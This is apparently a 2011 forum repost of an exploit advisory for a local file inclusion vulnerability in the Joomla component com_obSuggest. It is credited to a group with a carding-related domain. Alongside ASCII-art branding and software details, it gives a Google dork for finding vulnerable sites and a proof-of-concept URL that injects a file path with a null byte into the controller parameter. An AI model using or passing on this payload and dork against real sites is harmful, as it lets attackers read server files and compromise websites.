FearDotCom Posted August 1, 2011 Report Posted August 1, 2011 Joomla Component (com_obSuggest) Local File Inclusion Vulnerability 2011-07-31 09:15:06) ) ) ( ( ( ( ( ) )( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /()\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\.WEB.ID-----------------------------------------------------------------------Joomla Component obSuggest Local File Inclusion VulnerabilityAuthor : v3n0mDiscovered : July, 31-2011 GMT +7:00 Jakarta, IndonesiaSoftware : obSuggest - Uservoice for JoomlaDeveloper : Joomla Extensions, Joomla Services | fooblaLicense : GPLv2 or laterTested On : Joomla 1.5.xDorks : inurl:com_obsuggest-----------------------------------------------------------------------Proof of Concept:----------------http://127.0.0.1/[path]/index.php?option=com_obsuggest&controller=[LFI]%00Credits:-------www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id Quote